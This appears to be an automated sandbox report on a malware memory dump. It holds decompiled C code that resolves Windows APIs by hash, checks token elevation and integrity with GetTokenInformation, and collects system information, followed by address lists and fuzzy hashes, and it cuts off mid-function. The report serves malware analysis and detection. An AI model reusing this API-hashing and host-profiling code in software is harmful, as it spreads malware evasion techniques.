											E00420B10( &_v84);
											if(_t187 != 0) {
												E0042C580( &_v168, _t382,  &(_v156.lpMinimumApplicationAddress), 0xc28d248b);
												_push(_v156.dwOemId);
												_t419 = E0042C790( &_v176, _t382);
												E00420B10( &(_v156.lpMinimumApplicationAddress));
												E0042C580( &_v180, _t382,  &(_v156.dwPageSize), 0xead58213);
												_push(_v160);
												_t432 = E0042C790( &_v188, _t382);
												E00420B10( &_v164);
												if(_t419 != 0) {
													if(_t419 == 5) {
														if(_t432 == 0) {
															E00418CA0( &_v164);
															if(_v168 != 0) {
																_t406 = _v172;
																if(_t406 == 0 || _t406 == 0xffffffff) {
																	_t283 = 1;
																} else {
																	_t283 = 0;
																}
																if(_t283 == 0) {
																	E0042BF00(_t406);
																}
															}
															_v172 = 0;
															_t197 = 3;
															goto L64;
														} else {
															if(_t432 == 1) {
																E00418CA0( &_v164);
																if(_v168 != 0) {
																	_t407 = _v172;
																	if(_t407 == 0 || _t407 == 0xffffffff) {
																		_t286 = 1;
																	} else {
																		_t286 = 0;
																	}
																	if(_t286 == 0) {
																		E0042BF00(_t407);
																	}
																}
																_v172 = 0;
																_t197 = 4;
																goto L64;
															} else {
																goto L56;
															}
														}
														goto L236;
													} else {
														if(_t419 != 2 || _t432 != 1) {
															goto L56;
														} else {
															E00418CA0( &_v164);
															if(_v168 != 0) {
																_t409 = _v172;
																if(_t409 == 0 || _t409 == 0xffffffff) {
																	_t292 = 1;
																} else {
																	_t292 = 0;
																}
																if(_t292 == 0) {
																	E0042BF00(_t409);
																}
															}
															_v172 = 0;
															_t197 = 5;
														}
													}
												} else {
													if(_t432 != 0) {
														L56:
														E00418CA0( &_v164);
														if(_v168 != 0) {
															_t408 = _v172;
															if(_t408 == 0 || _t408 == 0xffffffff) {
																_t289 = 1;
															} else {
																_t289 = _t314;
															}
															if(_t289 == 0) {
																E0042BF00(_t408);
															}
														}
														_v172 = 0;
														_t197 = _t314;
													} else {
														E00418CA0( &_v164);
														if(_v168 != 0) {
															_t410 = _v172;
															if(_t410 == 0 || _t410 == 0xffffffff) {
																_t295 = 1;
															} else {
																_t295 = 0;
															}
															if(_t295 == 0) {
																E0042BF00(_t410);
															}
														}
														_v172 = 0;
														_t197 = 2;
													}
												}
											} else {
												E00418CA0( &_v156);
												if(_v160 != 0) {
													_t411 = _v164;
													if(_t411 == 0 || _t411 == 0xffffffff) {
														_t298 = 1;
													} else {
														_t298 = 0;
													}
													if(_t298 == 0) {
														E0042BF00(_t411);
													}
												}
												_v164 = 0;
												_t197 = 1;
											}
										} else {
											_t197 = 1;
										}
										L64:
										_t383 =  *0x43b1f0; // 0x2490528
										 *(_t445 + 0x1ac) = 0;
										 *(_t383 + 0x24) = _t197;
										_t384 =  *0x43b1f4; // 0x2491340
										if(_t384 == 0xc139578) {
											 *0x43b1f4 = 0;
											goto L70;
										} else {
											if(_t384 == 0) {
												L70:
												_push(0x3ab94787);
												_t432 = E00417564(0x3ab94787);
												if(_t432 == 0) {
													if(E00416C50(0x3ab94787) != 0) {
														_push(0x3ab94787);
														_t432 = E00417564(0x3ab94787);
													}
												}
												if(_t432 == 0) {
													goto L87;
												} else {
													_t445 = _t445 + 0xfffffff8;
													_t402 = E004167C8(_t432, 0xc17c5a6e);
													goto L73;
												}
											} else {
												do {
													_t368 = _t314;
													_t282 = _t368;
													while( *((intOrPtr*)(_t282 + _t384 + 8)) != 0xc17c5a6e) {
														_t368 = _t368 + 1;
														_t282 = _t282 + 0x18;
														if(_t368 < 0x10) {
															continue;
														} else {
															goto L69;
														}
														goto L88;
													}
													_t402 =  *((intOrPtr*)(_t282 + _t384 + 0x14));
													if(_t402 != 0) {
														L73:
														if(_t402 == 0) {
															L87:
															_t201 = _t314;
														} else {
															_push(_t445 + 0x1ac);
															_push(8);
															_push(0xffffffff);
															if( *_t402() == 0) {
																goto L87;
															} else {
																_t403 =  *0x43b1f4; // 0x2491340
																if(_t403 == 0xc139578) {
																	 *0x43b1f4 = 0;
																	goto L81;
																} else {
																	if(_t403 == 0) {
																		L81:
																		_push(0x3ab94787);
																		_t432 = E00417564(0x3ab94787);
																		if(_t432 == 0) {
																			if(E00416C50(0x3ab94787) != 0) {
																				_push(0x3ab94787);
																				_t432 = E00417564(0x3ab94787);
																			}
																		}
																		if(_t432 == 0) {
																			goto L87;
																		} else {
																			_t445 = _t445 + 0xfffffff8;
																			_t366 = E004167C8(_t432, 0x2eeff4c6);
																			goto L84;
																		}
																	} else {
																		do {
																			_t367 = _t314;
																			_t279 = _t367;
																			while( *((intOrPtr*)(_t279 + _t403 + 8)) != 0x2eeff4c6) {
																				_t367 = _t367 + 1;
																				_t279 = _t279 + 0x18;
																				if(_t367 < 0x10) {
																					continue;
																				} else {
																					goto L80;
																				}
																				goto L88;
																			}
																			_t366 =  *((intOrPtr*)(_t279 + _t403 + 0x14));
																			if(_t366 != 0) {
																				L84:
																				if(_t366 == 0) {
																					goto L87;
																				} else {
																					_t275 = GetTokenInformation(_v88, 0x14,  &_v100, 4,  &_v104); // executed
																					if(_t275 == 0) {
																						goto L87;
																					} else {
																						_t201 = _t314 & 0xffffff00 | _v104 > 0x00000000;
																					}
																				}
																			} else {
																				goto L81;
																			}
																			goto L88;
																			L80:
																			asm("o16 nop [eax+eax]");
																			_t66 = _t403 + 0x180; // 0x2498fa8
																			_t403 =  *_t66;
																		} while (_t403 != 0);
																		goto L81;
																	}
																}
															}
														}
													} else {
														goto L70;
													}
													goto L88;
													L69:
													asm("o16 nop [eax+eax]");
													_t62 = _t384 + 0x180; // 0x2498fa8
													_t384 =  *_t62;
												} while (_t384 != 0);
												goto L70;
											}
										}
										L88:
										_t344 =  *0x43b1f0; // 0x2490528
										 *(_t344 + 0x29) = _t201;
										 *((intOrPtr*)(_t344 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
										if( *_t344 >= 0x10) {
											_t386 =  *0x43b1f4; // 0x2491340
											 *(_t445 + 0x1a4) = 0;
											if(_t386 == 0xc139578) {
												 *0x43b1f4 = 0;
												goto L100;
											} else {
												if(_t386 == 0) {
													L100:
													_push(0x3ab94787);
													_t432 = E00417564(0x3ab94787);
													if(_t432 == 0) {
														if(E00416C50(0x3ab94787) != 0) {
															_push(0x3ab94787);
															_t432 = E00417564(0x3ab94787);
														}
													}
													if(_t432 != 0) {
														_t445 = _t445 + 0xfffffff8;
														_t386 = E004167C8(_t432, 0xc17c5a6e);
														goto L103;
													}
												} else {
													do {
														_t364 = _t314;
														_t263 = _t364;
														while( *((intOrPtr*)(_t263 + _t386 + 8)) != 0xc17c5a6e) {
															_t364 = _t364 + 1;
															_t263 = _t263 + 0x18;
															if(_t364 < 0x10) {
																continue;
															} else {
																goto L99;
															}
															goto L105;
														}
														_t386 =  *(_t263 + _t386 + 0x14);
														if(_t386 != 0) {
															L103:
															if(_t386 != 0) {
																 *_t386(0xffffffff, 8,  &_v76);
															}
														} else {
															goto L100;
														}
														goto L105;
														L99:
														asm("o16 nop [eax+eax]");
														_t84 = _t386 + 0x180; // 0x2498fa8
														_t386 =  *_t84;
													} while (_t386 != 0);
													goto L100;
												}
											}
											L105:
											_t346 =  &_v84;
											 *_t346 =  *(_t445 + 0x1a4);
											_t346[1] = 1;
											if(E0042BEA0(_t346, _t386, _t432) == 0) {
												_t387 =  *0x43b1f4; // 0x2491340
												_v88 = 0;
												if(_t387 == 0xc139578) {
													 *0x43b1f4 = 0;
													goto L114;
												} else {
													if(_t387 == 0) {
														L114:
														_push(0x3ab94787);
														_t432 = E00417564(0x3ab94787);
														if(_t432 == 0) {
															if(E00416C50(0x3ab94787) != 0) {
																_push(0x3ab94787);
																_t432 = E00417564(0x3ab94787);
															}
														}
														if(_t432 != 0) {
															_t445 = _t445 + 0xfffffff8;
															_t398 = E004167C8(_t432, 0x2eeff4c6);
															goto L117;
														}
													} else {
														do {
															_t362 = _t314;
															_t255 = _t362;
															while( *((intOrPtr*)(_t255 + _t387 + 8)) != 0x2eeff4c6) {
																_t362 = _t362 + 1;
																_t255 = _t255 + 0x18;
																if(_t362 < 0x10) {
																	continue;
																} else {
																	goto L113;
																}
																goto L119;
															}
															_t398 =  *((intOrPtr*)(_t255 + _t387 + 0x14));
															if(_t398 != 0) {
																L117:
																if(_t398 != 0) {
																	GetTokenInformation(_v96, 0x19, _t314, _t314,  &_v100); // executed
																}
															} else {
																goto L114;
															}
															goto L119;
															L113:
															asm("o16 nop [eax+eax]");
															_t94 = _t387 + 0x180; // 0x2498fa8
															_t387 =  *_t94;
														} while (_t387 != 0);
														goto L114;
													}
												}
												L119:
												_t212 = _v92;
												if(_t212 != 0) {
													_push(_t212);
													E00429350(_t445 + 8);
													_t433 = E00429640(_t445 + 8, 0);
													_t388 =  *0x43b1f4; // 0x2491340
													if(_t388 == 0xc139578) {
														 *0x43b1f4 = 0;
														goto L160;
													} else {
														if(_t388 == 0) {
															L160:
															_push(0x3ab94787);
															_t420 = E00417564(0x3ab94787);
															if(_t420 == 0) {
																if(E00416C50(0x3ab94787) != 0) {
																	_push(0x3ab94787);
																	_t420 = E00417564(0x3ab94787);
																}
															}
															if(_t420 == 0) {
																goto L178;
															} else {
																_t445 = _t445 + 0xfffffff8;
																_t394 = E004167C8(_t420, 0x2eeff4c6);
																goto L163;
															}
														} else {
															do {
																_t360 = _t314;
																_t247 = _t360;
																while( *((intOrPtr*)(_t247 + _t388 + 8)) != 0x2eeff4c6) {
																	_t360 = _t360 + 1;
																	_t247 = _t247 + 0x18;
																	if(_t360 < 0x10) {
																		continue;
																	} else {
																		goto L159;
																	}
																	goto L236;
																}
																_t394 =  *((intOrPtr*)(_t247 + _t388 + 0x14));
																if(_t394 != 0) {
																	L163:
																	if(_t394 == 0) {
																		L178:
																		E00429510( &_v496);
																		if(_v92 != 0) {
																			E0042BE30( &_v96, _t433);
																		}
																		goto L122;
																	} else {
																		_t234 = GetTokenInformation(_v104, 0x19, _t433, _v108,  &_v108); // executed
																		if(_t234 == 0) {
																			goto L178;
																		} else {
																			_t395 =  *0x43b1f4; // 0x2491340
																			if(_t395 == 0xc139578) {
																				 *0x43b1f4 = 0;
																				goto L171;
																			} else {
																				if(_t395 == 0) {
																					L171:
																					_push(0x3ab94787);
																					 *_t445 = E00417564(0x3ab94787);
																					if( *_t445 == 0) {
																						if(E00416C50(0x3ab94787) != 0) {
																							_push(0x3ab94787);
																							_v520 = E00417564(0x3ab94787);
																						}
																					}
																					if( *_t445 == 0) {
																						goto L176;
																					} else {
																						_t445 = _t445 + 0xfffffff8;
																						_t241 = E004167C8( *((intOrPtr*)(_t445 + 8)), 0x4e2f8db7);
																						goto L174;
																					}
																				} else {
																					do {
																						_t359 = _t314;
																						_t244 = _t359;
																						while( *((intOrPtr*)(_t244 + _t395 + 8)) != 0x4e2f8db7) {
																							_t359 = _t359 + 1;
																							_t244 = _t244 + 0x18;
																							if(_t359 < 0x10) {
																								continue;
																							} else {
																								goto L170;
																							}
																							goto L236;
																						}
																						_t241 =  *((intOrPtr*)(_t244 + _t395 + 0x14));
																						if(_t241 != 0) {
																							L174:
																							if(_t241 == 0) {
																								L176:
																								E00429510(_t445 + 4);
																								if(_v108 != 0) {
																									E0042BE30( &_v112, _t433);
																								}
																								goto L122;
																							} else {
																								_push( *_t433);
																								asm("int3");
																								return _t241;
																							}
																						} else {
																							goto L171;
																						}
																						goto L236;
																						L170:
																						asm("o16 nop [eax+eax]");
																						_t133 = _t395 + 0x180; // 0x2498fa8
																						_t395 =  *_t133;
																					} while (_t395 != 0);
																					goto L171;
																				}
																			}
																		}
																	}
																} else {
																	goto L160;
																}
																goto L236;
																L159:
																asm("o16 nop [eax+eax]");
																_t127 = _t388 + 0x180; // 0x2498fa8
																_t388 =  *_t127;
															} while (_t388 != 0);
															goto L160;
														}
													}
												} else {
													if(_v84 != 0) {
														E0042BE30( &_v88, _t432);
													}
													goto L122;
												}
											} else {
												if( *((char*)(_t445 + 0x198)) != 0) {
													E0042BE30( &_v84, _t432);
												}
												L122:
												_t434 = _t314;
												_t219 =  *0x43b1f0; // 0x2490528
												 *(_t219 + 0x2c) = _t434;
												goto L124;
											}
										} else {
											_t264 = E00415100(_t419, _t432, _t439);
											_t400 =  *0x43b1f0; // 0x2490528
											if(_t264 == 0) {
												if( *((char*)(_t400 + 0x28)) == 0) {
													 *(_t400 + 0x2c) = 3;
												} else {
													 *(_t400 + 0x2c) = 5;
												}
											} else {
												 *(_t400 + 0x2c) = 6;
											}
											L124:
											_t389 =  *0x43b1f4; // 0x2491340
											if(_t389 == 0xc139578) {
												 *0x43b1f4 = 0;
												goto L130;
											} else {
												if(_t389 == 0) {
													L130:
													_push(0xa1310f65);
													_t316 = E00417564(0xa1310f65);
													if(_t316 == 0) {
														if(E00416C50(0xa1310f65) != 0) {
															_push(0xa1310f65);
															_t316 = E00417564(0xa1310f65);
														}
													}
													if(_t316 != 0) {
														_t445 = _t445 + 0xfffffff8;
														_t392 = E004167C8(_t316, 0x4e85f18d);
														goto L133;
													}
												} else {
													do {
														_t354 = _t314;
														_t229 = _t354;
														while( *((intOrPtr*)(_t229 + _t389 + 8)) != 0x4e85f18d) {
															_t354 = _t354 + 1;
															_t229 = _t229 + 0x18;
															if(_t354 < 0x10) {
																continue;
															} else {
																goto L129;
															}
															goto L135;
														}
														_t392 =  *((intOrPtr*)(_t229 + _t389 + 0x14));
														if(_t392 != 0) {
															L133:
															if(_t392 != 0) {
																GetSystemInfo( &_v156);
															}
														} else {
															goto L130;
														}
														goto L135;
														L129:
														asm("o16 nop [eax+eax]");
														_t103 = _t389 + 0x180; // 0x2498fa8
														_t389 =  *_t103;
													} while (_t389 != 0);
													goto L130;
												}
											}
											L135:
											_t223 =  *0x43b1f0; // 0x2490528
											 *((short*)(_t223 + 0xe)) = _v156.dwAllocationGranularity;
											 *((intOrPtr*)(_t223 + 0x10)) = _v156.lpMaximumApplicationAddress;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t445 + 0x16c));
											 *((intOrPtr*)(_t223 + 0x18)) = _v156.dwNumberOfProcessors;
											 *((intOrPtr*)(_t223 + 0x1c)) = _v120;
											return _t223;
										}
									} else {
										_push(_t416);
										asm("int3");
										return _t308;
									}
								} else {
									break;
								}
								goto L236;
								L10:
								asm("o16 nop [eax+eax]");
								_t6 = _t377 + 0x180; // 0x2498fa8
								_t377 =  *_t6;
							} while (_t377 != 0);
							L11:
							_push(0xa1310f65);
							_t425 = E00417564(0xa1310f65);
							if(_t425 == 0) {
								if(E00416C50(0xa1310f65) != 0) {
									_push(0xa1310f65);
									_t425 = E00417564(0xa1310f65);
								}
							}
							if(_t425 == 0) {
								goto L16;
							} else {
								_t445 = _t445 + 0xfffffff8;
								_t308 = E004167C8(_t425, 0x13e99f60);
								goto L14;
							}
						}
					}
				} else {
					return _t163;
				}
				L236:
			}

0x00413931
0x00413936
0x00413937
0x00413938
0x00413939
0x0041393f
0x00413941
0x0041394b
0x0041478e
0x00414790
0x00414795
0x00414798
0x00414798
0x00413955
0x0041396a
0x00413976
0x0041397b
0x0041397e
0x00413984
0x00413992
0x0041477d
0x00414787
0x00000000
0x00413998
0x0041399a
0x004147a2
0x00000000
0x004139a0
0x004139a0
0x004139a2
0x004139a2
0x004139a4
0x004139a6
0x004139b4
0x004139b5
0x004139bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004139bb
0x0041476c
0x00414772
0x004139f5
0x004139f7
0x004139fc
0x004139fc
0x00413a06
0x00413a0a
0x00413a0e
0x00413a14
0x00413a17
0x00413a2d
0x00413a32
0x00413a3a
0x00413a41
0x00413a44
0x00413a4a
0x00413a51
0x00413a59
0x00414739
0x00000000
0x00413a5f
0x00413a61
0x00413a8e
0x00413a93
0x00413a99
0x00413a9d
0x00414710
0x0041471b
0x00414721
0x00414721
0x00414710
0x00413aa5
0x00413aae
0x00413ab6
0x00000000
0x00413ab6
0x00413a63
0x00413a63
0x00413a63
0x00413a65
0x00413a67
0x00413a75
0x00413a76
0x00413a7c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00413a7c
0x00414728
0x0041472e
0x00413ab8
0x00413aba
0x00413ac6
0x00413ac6
0x00000000
0x00414734
0x00000000
0x00414734
0x00000000
0x00413a7e
0x00413a7e
0x00413a84
0x00413a84
0x00413a8a
0x00000000
0x00413a63
0x00413a61
0x00413ac8
0x00413ac8
0x00413ad5
0x00413add
0x00413ad7
0x00413ad7
0x00413ad7
0x00413ae1
0x00413ae6
0x00413aee
0x00413af9
0x00413b05
0x00413b0c
0x00413b14
0x00413b1c
0x00413b25
0x00413b2e
0x00413b30
0x00413b35
0x00413b37
0x00413b44
0x00413b4b
0x00413b5d
0x00413b62
0x00413b63
0x00413b65
0x00413b6a
0x00413b72
0x00413b7b
0x00413b82
0x00413b9b
0x00413ba0
0x00413bae
0x00413bb3
0x00413bb7
0x00413bbe
0x00413c22
0x00413c27
0x00413c3a
0x00413c3e
0x00413c57
0x00413c5c
0x00413c6f
0x00413c78
0x00413c7f
0x00413cd3
0x0041465c
0x0041466f
0x0041467c
0x0041467e
0x00414687
0x00414692
0x0041468e
0x0041468e
0x0041468e
0x00414699
0x0041469c
0x0041469c
0x00414699
0x004146a1
0x004146ac
0x00000000
0x0041465e
0x00414661
0x004146bd
0x004146ca
0x004146cc
0x004146d5
0x004146e0
0x004146dc
0x004146dc
0x004146dc
0x004146e7
0x004146ea
0x004146ea
0x004146e7
0x004146ef
0x004146fa
0x00000000
0x00414663
0x00000000
0x00414663
0x00414661
0x00000000
0x00413cd9
0x00413cdc
0x00000000
0x00414108
0x0041410f
0x0041411c
0x0041411e
0x00414127
0x00414132
0x0041412e
0x0041412e
0x0041412e
0x00414139
0x0041413c
0x0041413c
0x00414139
0x00414141
0x0041414c
0x0041414c
0x00413cdc
0x00413c81
0x00413c83
0x00413ce7
0x00413cee
0x00413cfb
0x00413cfd
0x00413d06
0x00413d11
0x00413d0d
0x00413d0d
0x00413d0d
0x00413d18
0x00413d1b
0x00413d1b
0x00413d18
0x00413d20
0x00413d2b
0x00413c85
0x00413c8c
0x00413c99
0x00413c9b
0x00413ca4
0x00413caf
0x00413cab
0x00413cab
0x00413cab
0x00413cb6
0x00413cb9
0x00413cb9
0x00413cb6
0x00413cbe
0x00413cc9
0x00413cc9
0x00413c83
0x00413bc0
0x00413bc7
0x00413bd4
0x00413bd6
0x00413bdf
0x00413bea
0x00413be6
0x00413be6
0x00413be6
0x00413bf1
0x00413bf4
0x00413bf4
0x00413bf1
0x00413bf9
0x00413c04
0x00413c04
0x00413afb
0x00413afb
0x00413afb
0x00413d2d
0x00413d2d
0x00413d33
0x00413d3e
0x00413d41
0x00413d4d
0x0041464b
0x00000000
0x00413d53
0x00413d55
0x00413d82
0x00413d87
0x00413d8d
0x00413d91
0x00414622
0x0041462d
0x00414633
0x00414633
0x00414622
0x00413d99
0x00000000
0x00413d9f
0x00413da6
0x00413dae
0x00000000
0x00413dae
0x00413d57
0x00413d57
0x00413d57
0x00413d59
0x00413d5b
0x00413d69
0x00413d6a
0x00413d70
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00413d70
0x0041463a
0x00414640
0x00413db0
0x00413db2
0x00413e6d
0x00413e6d
0x00413db8
0x00413dbf
0x00413dc0
0x00413dc2
0x00413dc8
0x00000000
0x00413dce
0x00413dce
0x00413dda
0x0041418b
0x00000000
0x00413de0
0x00413de2
0x00413e0f
0x00413e14
0x00413e1a
0x00413e1e
0x00414162
0x0041416d
0x00414173
0x00414173
0x00414162
0x00413e26
0x00000000
0x00413e28
0x00413e2f
0x00413e37
0x00000000
0x00413e37
0x00413de4
0x00413de4
0x00413de4
0x00413de6
0x00413de8
0x00413df6
0x00413df7
0x00413dfd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00413dfd
0x0041417a
0x00414180
0x00413e39
0x00413e3b
0x00000000
0x00413e3d
0x00413e58
0x00413e5c
0x00000000
0x00413e5e
0x00413e68
0x00413e68
0x00413e5c
0x00414186
0x00000000
0x00414186
0x00000000
0x00413dff
0x00413dff
0x00413e05
0x00413e05
0x00413e0b
0x00000000
0x00413de4
0x00413de2
0x00413dda
0x00413dc8
0x00414646
0x00000000
0x00414646
0x00000000
0x00413d72
0x00413d72
0x00413d78
0x00413d78
0x00413d7e
0x00000000
0x00413d57
0x00413d55
0x00413e6f
0x00413e6f
0x00413e75
0x00413e8a
0x00413e8d
0x00413ec8
0x00413ece
0x00413edf
0x00414607
0x00000000
0x00413ee5
0x00413ee7
0x00413f14
0x00413f19
0x00413f1f
0x00413f23
0x004145de
0x004145e9
0x004145ef
0x004145ef
0x004145de
0x00413f2b
0x00413f34
0x00413f3c
0x00000000
0x00413f3c
0x00413ee9
0x00413ee9
0x00413ee9
0x00413eeb
0x00413eed
0x00413efb
0x00413efc
0x00413f02
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00413f02
0x004145f6
0x004145fc
0x00413f3e
0x00413f40
0x00413f4e
0x00413f4e
0x00414602
0x00000000
0x00414602
0x00000000
0x00413f04
0x00413f04
0x00413f0a
0x00413f0a
0x00413f10
0x00000000
0x00413ee9
0x00413ee7
0x00413f50
0x00413f57
0x00413f5e
0x00413f60
0x00413f6b
0x00413f8c
0x00413f92
0x00413fa3
0x004145c3
0x00000000
0x00413fa9
0x00413fab
0x00413fd8
0x00413fdd
0x00413fe3
0x00413fe7
0x0041459a
0x004145a5
0x004145ab
0x004145ab
0x0041459a
0x00413fef
0x00413ff8
0x00414000
0x00000000
0x00414000
0x00413fad
0x00413fad
0x00413fad
0x00413faf
0x00413fb1
0x00413fbf
0x00413fc0
0x00413fc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00413fc6
0x004145b2
0x004145b8
0x00414002
0x00414004
0x00414019
0x00414019
0x004145be
0x00000000
0x004145be
0x00000000
0x00413fc8
0x00413fc8
0x00413fce
0x00413fce
0x00413fd4
0x00000000
0x00413fad
0x00413fab
0x0041401b
0x0041401b
0x00414024
0x004141de
0x004141e3
0x004141f3
0x004141f5
0x00414201
0x0041457f
0x00000000
0x00414207
0x00414209
0x00414236
0x0041423b
0x00414241
0x00414245
0x00414556
0x00414561
0x00414567
0x00414567
0x00414556
0x0041424d
0x00000000
0x00414253
0x0041425a
0x00414262
0x00000000
0x00414262
0x0041420b
0x0041420b
0x0041420b
0x0041420d
0x0041420f
0x0041421d
0x0041421e
0x00414224
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00414224
0x0041456e
0x00414574
0x00414264
0x00414266
0x00414470
0x00414474
0x00414481
0x0041448e
0x0041448e
0x00000000
0x0041426c
0x00414285
0x00414289
0x00000000
0x0041428f
0x0041428f
0x0041429b
0x0041453b
0x00000000
0x004142a1
0x004142a3
0x004142d0
0x004142d5
0x004142db
0x004142e2
0x00414511
0x0041451c
0x00414522
0x00414522
0x00414511
0x004142ec
0x00000000
0x004142f2
0x004142f2
0x004142fe
0x00000000
0x004142fe
0x004142a5
0x004142a5
0x004142a5
0x004142a7
0x004142a9
0x004142b7
0x004142b8
0x004142be
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004142be
0x0041452a
0x00414530
0x00414303
0x00414305
0x00414448
0x0041444c
0x00414459
0x00414466
0x00414466
0x00000000
0x0041430b
0x0041430b
0x0041430d
0x0041430e
0x0041430e
0x00414536
0x00000000
0x00414536
0x00000000
0x004142c0
0x004142c0
0x004142c6
0x004142c6
0x004142cc
0x00000000
0x004142a5
0x004142a3
0x0041429b
0x00414289
0x0041457a
0x00000000
0x0041457a
0x00000000
0x00414226
0x00414226
0x0041422c
0x0041422c
0x00414232
0x00000000
0x0041420b
0x00414209
0x0041402a
0x00414032
0x0041403b
0x0041403b
0x00000000
0x00414032
0x00413f6d
0x00413f75
0x00413f82
0x00413f82
0x00414040
0x00414040
0x00414042
0x00414047
0x00000000
0x00414047
0x00413e8f
0x00413e8f
0x00413e94
0x00413e9c
0x00413eae
0x00413ebc
0x00413eb0
0x00413eb0
0x00413eb0
0x00413e9e
0x00413e9e
0x00413e9e
0x0041404a
0x0041404a
0x00414056
0x004141cf
0x00000000
0x0041405c
0x0041405e
0x0041408b
0x00414090
0x00414096
0x0041409a
0x004141a6
0x004141b1
0x004141b7
0x004141b7
0x004141a6
0x004140a2
0x004140ab
0x004140b3
0x00000000
0x004140b3
0x00414060
0x00414060
0x00414060
0x00414062
0x00414064
0x00414072
0x00414073
0x00414079
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00414079
0x004141be
0x004141c4
0x004140b5
0x004140b7
0x004140c1
0x004140c1
0x004141ca
0x00000000
0x004141ca
0x00000000
0x0041407b
0x0041407b
0x00414081
0x00414081
0x00414087
0x00000000
0x00414060
0x0041405e
0x004140c3
0x004140c3
0x004140eb
0x004140ef
0x004140f2
0x004140f5
0x004140f8
0x00414107
0x00414107
0x004139f9
0x004139f9
0x004139fa
0x004139fb
0x004139fb
0x00414778
0x00000000
0x00414778
0x00000000
0x004139bd
0x004139bd
0x004139c3
0x004139c3
0x004139c9
0x004139cd
0x004139d2
0x004139d8
0x004139dc
0x00414754
0x0041475f
0x00414765
0x00414765
0x00414754
0x004139e4
0x00000000
0x004139e6
0x004139ed
0x004139f0
0x00000000
0x004139f0
0x004139e4
0x0041399a
0x0041395d
0x00413969
0x00413969
0x00000000

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cd7c1afd91c1faa6beab2d7f22e0ae5f081505baa1d04a1c896c5025fbf3545
Instruction ID: 7523b1495920490489e188cdca10cfac2d7bc4b25e772065482cbfb7633c4895
Opcode Fuzzy Hash: 4cd7c1afd91c1faa6beab2d7f22e0ae5f081505baa1d04a1c896c5025fbf3545
Instruction Fuzzy Hash: C352E4707043419BD7349F1988947EB76A6ABC1348F18862FE5499B392EB3CCDC5C78A

Uniqueness

Uniqueness Score: -1.00%

Function 00416C50, Relevance: 2.1, APIs: 1, Instructions: 584
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00416C50(signed int __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t135;
				intOrPtr _t138;
				void* _t143;
				void* _t147;
				void* _t151;
				struct _OBJDIR_INFORMATION _t164;
				void* _t170;
				intOrPtr _t183;
				struct _OBJDIR_INFORMATION _t197;
				struct _OBJDIR_INFORMATION _t206;
				long _t212;
				void* _t215;
				intOrPtr _t246;
				signed int _t278;
				signed int _t279;
				void* _t281;
				intOrPtr _t282;
				void* _t291;
				void* _t340;
				struct _OBJDIR_INFORMATION _t342;
				intOrPtr _t345;
				struct _OBJDIR_INFORMATION _t363;
				intOrPtr _t366;
				struct _OBJDIR_INFORMATION _t382;
				struct _OBJDIR_INFORMATION _t389;
				struct _OBJDIR_INFORMATION _t390;
				struct _OBJDIR_INFORMATION _t391;
				intOrPtr* _t394;
				void* _t395;
				intOrPtr* _t397;
				void* _t398;
				void* _t399;
				void* _t401;
				void* _t402;
				void* _t404;
				void* _t405;
				void* _t406;
				short* _t407;
				void* _t408;
				void* _t410;
				void* _t411;
				intOrPtr _t412;
				intOrPtr* _t413;
				short* _t418;
				void* _t420;
				void* _t421;
				intOrPtr* _t422;
				void* _t424;
				void* _t425;
				struct _OBJDIR_INFORMATION* _t426;

				_t278 = __ecx;
				E00418810(_t426 + 0x2c8, 0);
				E00418810(_t426 + 0x2d0, 0);
				_t135 = E00413930(__ecx, 0, _t399, _t406); // executed
				_t412 =  *0x43b208;
				if( *((char*)(_t135 + 0xb)) == 0x40) {
					if(_t412 == 0x228324a5) {
						_push(0x80);
						_t413 = E00411030();
						_t426 = _t426 + 4;
						if(_t413 == 0) {
							_t413 = 0;
						} else {
							_t122 = _t413 + 8; // 0x8
							 *_t413 = 0;
							 *((intOrPtr*)(_t413 + 4)) = 0;
							E00418810(_t122, 0);
							_t124 = _t413 + 0x10; // 0x10
							E00418810(_t124, 0);
							_t125 = _t413 + 0x18; // 0x18
							E00418810(_t125, 0);
							_t126 = _t413 + 0x20; // 0x20
							E00418810(_t126, 0);
							_t127 = _t413 + 0x28; // 0x28
							E00418810(_t127, 0);
							_t128 = _t413 + 0x30; // 0x30
							E00418810(_t128, 0);
							_t129 = _t413 + 0x38; // 0x38
							E00418810(_t129, 0);
							_t130 = _t413 + 0x40; // 0x40
							E00418810(_t130, 0);
							_t131 = _t413 + 0x48; // 0x48
							E00418810(_t131, 0);
							_t410 = 6;
							_t132 = _t413 + 0x50; // 0x50
							_t404 = _t132;
							do {
								E00418810(_t404, 0);
								_t404 = _t404 + 8;
								_t410 = _t410 - 1;
							} while (_t410 != 0);
						}
						 *0x43b208 = _t413;
					}
					if(E00419DC0(_t413 + 0x38) != 0) {
						E00418810(_t426 + 0x26c, 0x80);
						_t342 =  *0x43b1f4; // 0x2491340
						if(_t342 == 0xc139578) {
							 *0x43b1f4 = 0;
							goto L86;
						} else {
							if(_t342 == 0) {
								L86:
								_push(0xa1310f65);
								_t420 = E00417564(0xa1310f65);
								if(_t420 == 0) {
									if(E00416C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t420 = E00417564(0xa1310f65);
									}
								}
								if(_t420 != 0) {
									_t426 = _t426 + 0xfffffff8;
									_t394 = E004167C8(_t420, 0x7c2e142f);
									goto L89;
								}
							} else {
								do {
									_t421 = 0;
									_t395 = 0;
									while( *((intOrPtr*)(_t395 + _t342 + 8)) != 0x7c2e142f) {
										_t421 = _t421 + 1;
										_t395 = _t395 + 0x18;
										if(_t421 < 0x10) {
